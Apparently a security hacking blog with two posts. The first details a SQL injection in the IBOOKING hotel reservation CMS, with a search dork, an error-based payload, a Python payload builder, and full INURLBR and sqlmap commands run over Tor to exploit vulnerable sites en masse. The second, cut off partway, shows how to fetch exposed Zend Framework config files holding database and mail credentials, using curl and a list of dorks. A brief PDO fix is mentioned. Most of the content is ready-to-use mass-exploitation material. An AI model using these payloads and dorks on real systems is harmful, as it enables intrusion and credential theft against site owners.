<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYYwSbP0g4Hm-QCm_PwlExOmxNOGBRg84M8G_b_V8Qg2jjHTctku5FMJTQ2TRfq3EZUY0aaIqYTyDNHnZtisWiJZ79L8zIJTMPxZ_N7AGvlG0zud3VYO10bliTigp5x_RoYWcjA8XvQpVV/s1600/Captura+de+tela+de+2015-09-15+20%253A28%253A03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYYwSbP0g4Hm-QCm_PwlExOmxNOGBRg84M8G_b_V8Qg2jjHTctku5FMJTQ2TRfq3EZUY0aaIqYTyDNHnZtisWiJZ79L8zIJTMPxZ_N7AGvlG0zud3VYO10bliTigp5x_RoYWcjA8XvQpVV/s640/Captura+de+tela+de+2015-09-15+20%253A28%253A03.png" width="640" /></a></div>
<b><br /></b>
<b><br /></b>
<b>IBOOKING <a href="http://blog.inurl.com.br/search/label/cms" target="_blank">CMS</a></b> is a system aimed at the hotel business: reservation management.<br />
As the developer's own site puts it:<br />
<br />
<blockquote class="tr_bq">
<i><b>Booking engine:</b> With our booking engine you can sell your hotel's room nights directly on your website without paying commission. An effective way to increase your profitability and interact with the customer from the moment of purchase.</i></blockquote>
<br />
This system has a serious <a href="http://blog.inurl.com.br/search/label/sqli" target="_blank">SQL Injection</a> flaw, exploited through a <b>GET</b> request in the <span style="font-family: monospace; white-space: pre-wrap;"><b>idPousada</b> parameter of the file </span><span style="font-family: monospace;"><b style="white-space: pre-wrap;">filtro_faixa_etaria.php</b><span style="white-space: pre-wrap;"> inside the folder or dynamic URL</span> <b style="white-space: pre-wrap;">/</b></span><span style="font-family: monospace; white-space: pre-wrap;"><b>motor-de-reservas/</b>.
</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; white-space: pre-wrap;"><b>INFORMATION:</b></span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; white-space: pre-wrap;">[+] VENDOR: WWW.<b>ibooking.com.br</b>
[+] VULNERABLE VERSIONS: <b>ALL</b>
[+] FILE: <b>filtro_faixa_etaria.php</b>
[+] FOLDER OR DYNAMIC URL: <b>/motor-de-reservas</b>
[+] PARAMETER: <b>idPousada <i>(GET)</i></b>
[+] DORK: <b>intext:"Desenvolvido por ibooking"</b>
[+] REPORTED: <b>15/10/2015</b></span><br />
<span style="font-family: monospace; white-space: pre-wrap;"><br /></span>
<span style="font-family: monospace;"><span style="white-space: pre-wrap;">The vulnerable request is issued by a JavaScript function found inside </span></span><span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;"><b>/motor-de-reservas</b></span><br />
<span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="white-space: pre-wrap;">Code:</span></b></span><span style="font-family: monospace; white-space: pre-wrap;">
</span>
<br />
<pre><span style="font-family: Courier New, Courier, monospace;">jQuery(function($){
    // Reloads the age-range filter whenever the number of rooms changes.
    // idPousada is hard-coded client-side, but the server still reads it from the query string.
    $("#quartos").change(function() {
        var qtde_quartos = $(this).val();
        $.ajax({
            type: "GET",
            url: "filtro_faixa_etaria.php",
            data: "qtde_quartos="+qtde_quartos+"&idPousada=61",
            success: function(xml){
                $("#filtro_faixa_etaria").html(xml);
            }
        });
    });
    // Initial load, with one room
    $.ajax({
        type: "GET",
        url: "filtro_faixa_etaria.php",
        data: "qtde_quartos=1&idPousada=61",
        success: function(xml){
            $("#filtro_faixa_etaria").html(xml);
        }
    });
});</span>
</pre>
<span style="white-space: pre-wrap;"><span style="font-family: monospace;"><br /></span></span>
<span style="font-family: monospace; white-space: pre-wrap;">
</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="white-space: pre-wrap;">Vulnerable URL:</span></b></span><br />
<span style="font-family: monospace; white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><span style="font-family: Courier New, Courier, monospace;">http://www.TARGET.br<b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61</b></span></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>POC:</b></span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;">http://www.TARGET.br</span><b style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;">/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61<span style="color: red;">+(SQL_INJECTION)</span>
Example:</b><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">http://www.TARGET.br<b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61<span style="color: red;">+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)</span></b></span><br />
<br />
The injection itself uses basic SQL injection building blocks (the classic error-based trick: COUNT(*) grouped by a CONCAT that includes FLOOR(RAND(0)*2), which makes MySQL raise a "Duplicate entry" error carrying the concatenated string); what sets it apart is the use of MySQL global system variables.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">@@GLOBAL.version = MYSQL DATABASE SERVER VERSION</span><br />
<span style="font-family: Courier New, Courier, monospace;">@@GLOBAL.version_compile_os = OPERATING SYSTEM THE SERVER WAS COMPILED FOR</span><br />
<span style="font-family: Courier New, Courier, monospace;">@@GLOBAL.version_compile_machine = MACHINE / CPU ARCHITECTURE OF THE SERVER</span><br />
<br />
I also pass the string <b><span style="font-family: Courier New, Courier, monospace;">::INURLBR_VULN::</span></b> in hexadecimal form, so that later I can verify that the injection ran as expected: the marker only shows up in the response if MySQL actually evaluated the CONCAT. Writing it as a hex literal keeps quotes out of the payload, so it works inside a numeric parameter and survives quote filtering.<br />
<span style="font-family: Courier New, Courier, monospace;">0x203a3a494e55524c42525f56554c4e3a3a20 = <b> ::INURLBR_VULN:: </b> (with a leading and a trailing space, 0x20)</span><br />
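As an added example (not the post's code and not the INURLBR scanner's own implementation), the marker trick in Python: hex-encode the marker, build the error-based payload around an expression, and check a response body for the marker the way the scanner's <b>-a 'INURLBR_VULN'</b> validation does. The two response bodies are constructed for this demo, and the version string inside the "Duplicate entry" error is made up:<br />

```python
"""Added example (not from the original post, not INURLBR's own code):
the hex marker, the error-based payload built around it, and the
marker-in-response check. Response bodies below are constructed."""
import re
from urllib.parse import urlencode

# The marker, including the leading/trailing space encoded as 0x20 in the post
MARKER = " ::INURLBR_VULN:: "

# The expression extracted in the post: server version, OS and architecture
VERSION_EXPR = ("SELECT (concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,"
                "0x20,@@GLOBAL.version_compile_machine))")


def to_hex_literal(s: str) -> str:
    """MySQL hexadecimal string literal (0x...) for s: no quotes needed in the payload."""
    return "0x" + s.encode("utf-8").hex()


def build_payload(marker: str, expr: str) -> str:
    """Error-based payload: grouping by CONCAT(marker, expr, marker, FLOOR(RAND(0)*2))
    makes MySQL raise 'Duplicate entry ... for key', and that error text carries expr."""
    hx = to_hex_literal(marker)
    return (f"AND (SELECT 2692 FROM(SELECT COUNT(*),CONCAT({hx},({expr}),{hx},"
            f"FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")


def build_url(host: str, payload: str, id_pousada: int = 61, qtde_quartos: int = 3) -> str:
    """The post's vulnerable URL with the payload appended to idPousada (URL-encoded)."""
    query = urlencode({"qtde_quartos": qtde_quartos,
                       "idPousada": f"{id_pousada} {payload}"})
    return f"http://{host}/motor-de-reservas/filtro_faixa_etaria.php?{query}"


def extract(body: str, marker: str):
    """Text between the two markers in a response body, or None if absent."""
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), body, re.S)
    return m.group(1) if m else None


def is_vulnerable(body: str, marker: str = MARKER) -> bool:
    """What -a 'INURLBR_VULN' effectively checks: did the marker come back?"""
    return extract(body, marker) is not None


# Constructed responses: a MySQL duplicate-key error echoed by the page, and a clean page
SAMPLE_VULN = ("Duplicate entry ' ::INURLBR_VULN:: 5.5.44-0+deb7u1 debian-linux-gnu x86_64"
               " ::INURLBR_VULN:: 1' for key 'group_key'")
SAMPLE_CLEAN = "Faixa etaria: 0-12 anos / 13-17 anos / adultos"

if __name__ == "__main__":
    print(build_url("www.TARGET.br", build_payload(MARKER, VERSION_EXPR)))
    print(is_vulnerable(SAMPLE_VULN), extract(SAMPLE_VULN, MARKER))
    print(is_vulnerable(SAMPLE_CLEAN))
```

The hex literal the function produces is exactly the one in the post, and the payload it builds matches the post's string once spaces are written as <b>+</b>; only the bracketed text between the two markers is taken as the extracted value, so stray occurrences of the word elsewhere on the page do not count as a hit.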
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Screenshot of the injection output:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEBv3k1rCAeJPTwoT72VqecNUzqqSKMBDhkRA2z0npazMQyp339HZFRAecMPI4MWekYHqOf6TtAVekDkQj1-DqSiX8MpHIIpcmpWKIhSbbyn9An21KyjYmsW7FlTHQKagw0CVnkgCrNCje/s1600/Captura+de+tela+de+2015-09-15+18%253A42%253A51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Injection output" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEBv3k1rCAeJPTwoT72VqecNUzqqSKMBDhkRA2z0npazMQyp339HZFRAecMPI4MWekYHqOf6TtAVekDkQj1-DqSiX8MpHIIpcmpWKIhSbbyn9An21KyjYmsW7FlTHQKagw0CVnkgCrNCje/s640/Captura+de+tela+de+2015-09-15+18%253A42%253A51.png" title="Injection output" width="640" /></a></div>
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Mass exploitation using the INURLBR scanner</b></span><br />
Download: <a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<br />
Building the command:<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SETTING THE SEARCH DORK</b></span><br />
<i>--dork 'YOUR_DORK'</i><br />
- <b>USE</b> <span style="color: red; font-family: Courier New, Courier, monospace;">--dork 'intext:"Desenvolvido por ibooking"'</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SETTING THE OUTPUT FILE:</b></span><br />
- <b>USE</b>: <span style="color: red; font-family: Courier New, Courier, monospace;">-s 'ibooking.txt'</span><br />
<br />
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">SETTING THE GET EXPLOIT STRING</b><br />
<i>--exploit-get 'EXPLOIT_GET'</i><br />
<b>- USE</b>: <span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SETTING THE VALIDATION TYPE: </span></b><br />
- <b>USE</b>: <span style="color: red; font-family: Courier New, Courier, monospace;">-t 3 </span><br />
<i>Type 3 checks for the string defined by -a 'VALUE_INSIDE_THE_TARGET' on top of the scanner's default checks; what makes it different is that the --exploit-get string is appended directly to the URL of each target:</i><br />
<i>Example: --exploit-get '/index.php?id=1&file=conect.php'</i> gives the URL: http://www.target.br<i>/index.php?id=1&file=conect.php</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SETTING THE VALIDATION STRING:</b></span><br />
<i>Specify the string the script will use as validation:</i><br />
<i>Example: -a {string}</i><br />
<i>Using: -a '&lt;title&gt;hello world&lt;/title&gt;'</i><br />
<i>If the specified value is found in the target's response, the target is considered vulnerable.</i><br />
- <b>USE</b>: <span style="color: red; font-family: Courier New, Courier, monospace;"> <b>-a</b> 'INURLBR_VULN'</span><br />
<i>The value <span style="color: red; font-family: 'Courier New', Courier, monospace;">INURLBR_VULN </span>is the one passed in hexadecimal form inside the <b>exploit-get</b> string; a hit means the database echoed it back through the error message.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">FULL COMMAND:</span></b><br />
<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;">php inurlbr.php <b>--dork</b> <b>'</b>intext:"Desenvolvido por ibooking"<b>'</b> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-s '</b>ibooking.txt<b>'</b> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>--exploit-get '</b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)<b>'</b> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-t</b> 3 </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-a</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>'</b>INURLBR_VULN<b>'</b></span><br />
<div>
<span style="color: red; font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Output screenshot:</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVniL6cbLqdDGqR9jT2xSogV5atT0EjCScarp_hO0mZec93-dWrjxaQzDXemZtOlJYfspseUQiKoGDaYDEpb_XteoEx9hZK319XJABAsWhOXjbFHMnnBgnE593VXgqSNCOgmgId7TfJSLV/s1600/Captura+de+tela+de+2015-09-15+20%253A11%253A32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="INURLBR scanner output" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVniL6cbLqdDGqR9jT2xSogV5atT0EjCScarp_hO0mZec93-dWrjxaQzDXemZtOlJYfspseUQiKoGDaYDEpb_XteoEx9hZK319XJABAsWhOXjbFHMnnBgnE593VXgqSNCOgmgId7TfJSLV/s640/Captura+de+tela+de+2015-09-15+20%253A11%253A32.png" title="INURLBR scanner output" width="640" /></a></div>
<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">EXPLOITING VIA <a href="http://blog.inurl.com.br/search/label/sqlmap" target="_blank">SQLMAP</a>:</span></b><br />
<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">python sqlmap.py <b>-u</b> <b>'</b>http://www.target.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61<b>'</b> <b>--dbs</b> <b>--random-agent</b> <b>--tor --tor-type</b>=SOCKS5 <b>-p</b> idPousada <b>--answers</b>=<b>'</b>follow=N,union-char=Y,time-sec=10,level=3,risk=2,dbms=MySQL,testing=Y,WAF/IPS/IDS=Y,check=Y<b>'</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<br />
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">EXPLOITING WITH <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">INURLBR</a> + SQLMAP:</span></b></div>
<div>
<i>Using the inurlbr option <b>--command-vul</b>, the scanner runs the given sqlmap command whenever it flags a possible vulnerability according to the information provided; <b>_TARGET_</b> in that command is replaced with the flagged host.</i></div>
<div>
<br /></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> 'intext:"Desenvolvido por ibooking"' <b>-s '</b>ibooking.txt<b>'</b> <b>--exploit-get '</b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)<b>'</b> <b>-t</b> 3 <b>-a</b> 'INURLBR_VULN' <b>--command-vul "</b><i>python sqlmap.py -u 'http://<b>_TARGET_</b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --technique=BEUS --answers='follow=N,union-char=Y,time-sec=2,level=3,risk=2,dbms=MySQL,testing=Y,WAF/IPS/IDS=Y,check=Y' --flush-session</i><b>"</b></span></div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Output screenshot:</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5jXnrj5r3ayazo3vy4RIxnJ12T-dE7jOSdCQ4cWHJ9CLQlXzV541Ctkv-IiaFmvlA0NrEyJH-YeupRT_K6EAM2oSWEjunqcsN7hN8qSw7ZvE5eSwthWrvj30CuAZEXAuoaRtvZdaf9Ptj/s1600/Captura+de+tela+de+2015-09-15+20%253A28%253A03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="INURLBR + sqlmap output" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5jXnrj5r3ayazo3vy4RIxnJ12T-dE7jOSdCQ4cWHJ9CLQlXzV541Ctkv-IiaFmvlA0NrEyJH-YeupRT_K6EAM2oSWEjunqcsN7hN8qSw7ZvE5eSwthWrvj30CuAZEXAuoaRtvZdaf9Ptj/s640/Captura+de+tela+de+2015-09-15+20%253A28%253A03.png" title="INURLBR + sqlmap output" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<h3>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Solução ?</b></span></h3>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Use PDO.</b></span><br />
<a href="http://php.net/manual/pt_BR/book.pdo.php" target="_blank">http://php.net/manual/pt_BR/book.pdo.php</a></div>
<div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Use Prepares statement sem moderação:</span></b></div>
<div>
<a href="http://php.net/manual/pt_BR/pdo.prepare.php" target="_blank">http://php.net/manual/pt_BR/pdo.prepare.php</a><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Filter request input, whether POST or GET:</span></b></div>
<div>
<a href="http://php.net/manual/en/filter.filters.sanitize.php" target="_blank">http://php.net/manual/en/filter.filters.sanitize.php</a></div>
<div>
<br /></div>
<div>
<i>Whether or not the file is visible to the client, it can be vulnerable just the same.</i></div>
<div>
<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Another flaw found in the system last week, titled:</span></b><br />
<i>(0day) IBOOKING CMS - LOCAL FILE DISCLOSURE VULNERABILITY<br />Found by: Pablo Verlly Moreira; it has already been reported and fixed by the admin, but without so much as a thank-you from the team.</i><br />
<a href="https://ghostbin.com/paste/e99uz" target="_blank">https://ghostbin.com/paste/e99uz</a><br />
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>References:</b></span></div>
<div>
<a href="http://seclists.org/fulldisclosure/2015/Sep/56">http://seclists.org/fulldisclosure/2015/Sep/56</a></div>
<div>
<a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" target="_blank">https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</a></div>
<div>
<a href="https://www.owasp.org/index.php/Automated_Audit_using_SQLMap" target="_blank">https://www.owasp.org/index.php/Automated_Audit_using_SQLMap</a></div>
<div>
<a href="https://dev.mysql.com/doc/refman/5.0/en/hexadecimal-literals.html" target="_blank">https://dev.mysql.com/doc/refman/5.0/en/hexadecimal-literals.html</a></div>
<h3>Exploiting a Zend Framework Full Info Disclosure flaw, again! again!</h3>
<div>Posted by InurlBR, 2015-09-08</div>
<h3 style="text-align: center;">
<span style="font-size: large;">3xpl0r1ng Z3nd Fr4m3w0rk Full 1nf0 D15cl05ur3</span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd137aeTK4dTtG9yKzJcbnZGacuCOXVM1K-98pIgVv1nMH2y1D4JyHOsxFhDyUuvNBE-L73YODJegX-0MiphS2eA4YfxsF_9VV75gBDzBkwISc-9OxkraYb9YzrpTiCapU30l_53bVUhYe/s1600/17-02-2013_Zend-logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Zend Framework logo" border="0" height="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd137aeTK4dTtG9yKzJcbnZGacuCOXVM1K-98pIgVv1nMH2y1D4JyHOsxFhDyUuvNBE-L73YODJegX-0MiphS2eA4YfxsF_9VV75gBDzBkwISc-9OxkraYb9YzrpTiCapU30l_53bVUhYe/s320/17-02-2013_Zend-logo.jpg" width="320" /></a></div>
<div>
<span style="font-size: large;"><br /></span></div>
<div style="text-align: center;">
4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! </div>
<div style="text-align: center;">
<br />
<div style="text-align: left;">
Well, my friends, the blog had been a bit quiet because of some things I have been working on, but I found a little time at 3 in the morning to write this humble text and pass along something a bit old that is still very much current, thanks to the inattention of many devs &amp; admins.</div>
<div style="text-align: left;">
It is a flaw in the <a href="http://blog.inurl.com.br/search/label/zend" target="_blank">Zend Framework</a> that makes it possible to read the local application's configuration files.<br />
That exposes information such as:<br />
<div>
<ol>
<li><span style="font-family: 'Courier New', Courier, monospace;">'mail.transport.username'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'mail.transport.password'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'</span><span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;">db.adapter</span><span style="font-family: 'Courier New', Courier, monospace;">'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'db.params.host'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'db.params.username'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'db.params.password'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'db.params.dbname'</span></li>
</ol>
</div>
</div>
<div style="text-align: left;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Example:</b></span><br />
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.mail.transport.host =<b>"smtp.target.com.br"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.mail.transport.auth = <b>"loginre"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">sources.mail.transport.username = <b>"wangxydlutre"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">sources.mail.transport.password = <b>"12333"</b></span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.adapter = <b>"PDO_MYSQL"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.params.host = <b>"mysql.target.com.br"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.params.username =<b> "root"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.params.password = <b>"123456"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.params.dbname = <b>"db_app_teste"</b></span></div>
<br />
Such information is found in the files<b><span style="font-family: Courier New, Courier, monospace;"> <i>application</i>.ini,</span></b><span style="font-family: Courier New, Courier, monospace;"><b><i>db</i>.ini, <i>config</i>.ini </b></span>inside the folder<span style="font-family: Courier New, Courier, monospace;"><b> /application/configs</b></span>.</div>
<div style="text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div style="text-align: left;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Example URL structure:</b></span><br />
<ul>
<li>http://{target}/folder<b style="font-family: 'Courier New', Courier, monospace;">/application/configs/</b><b><span style="font-family: Courier New, Courier, monospace;"><i>{file}</i>.ini</span></b></li>
<li>http://<b style="font-family: 'Courier New', Courier, monospace;"><span style="font-family: 'Times New Roman'; font-weight: normal;">{target}</span>/application/configs/<i>{file}</i></b><b><span style="font-family: Courier New, Courier, monospace;">.ini</span></b></li>
</ul>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Accessing the file via curl:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">curl 'http://{target}/application/configs/application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)'</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYGruzoBZwNGaZoUNLhc4oSzCiqOZv4e9cpReLXcb9frTOfnr4r8K48Efv9VsmprtaclwMXKVyUo4GkkgoUvNMIjC7CIu3UdySVPHabt_nu3aE5nHYUhi9Xh8Gtgx179JGkIwldpxxTx7E/s1600/Captura+de+tela+de+2015-09-08+04%253A06%253A12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: fetching application.ini with curl" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYGruzoBZwNGaZoUNLhc4oSzCiqOZv4e9cpReLXcb9frTOfnr4r8K48Efv9VsmprtaclwMXKVyUo4GkkgoUvNMIjC7CIu3UdySVPHabt_nu3aE5nHYUhi9Xh8Gtgx179JGkIwldpxxTx7E/s640/Captura+de+tela+de+2015-09-08+04%253A06%253A12.png" width="640" /></a></div>
<div>
<br /></div>
<div>
With the concept of how to access that file and what can be found in it covered, let's move on to searching for servers.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>DORK[s]:</b></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div>
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">site:br index of "/application/configs/"</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:/application/configs/application.ini</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">site:com ext:ini inurl:/application/ -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">-site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:/configs/ "params.password" db.ini ext:ini</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">-github.com -mozilla.org -.google.com inurl:/application/ ext:ini password</span></li>
</ul>
</div>
<div>
<br /></div>
<div>
Now let's exploit en masse with the SCANNER <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">inurlbr</a></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Download the tool:</span></b><br />
<a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a></div>
<div>
<br />
Build the command from the information we already have; the main goal is to find possible servers through search engines and immediately test the likely content of each URL found.<br />
The INURLBR script already ships with a set of strings for that validation by default:<br />
<div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">/* [*]ZEND FRAMEWORK</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">* Zend-Framework Full Info Disclosure</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">* The username and password of the database may be obtained through </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">* the "application.ini" file</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">* <a href="https://www.exploit-db.com/exploits/29921/" target="_blank">https://www.exploit-db.com/exploits/29921/</a> */</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';</span></div>
<div>
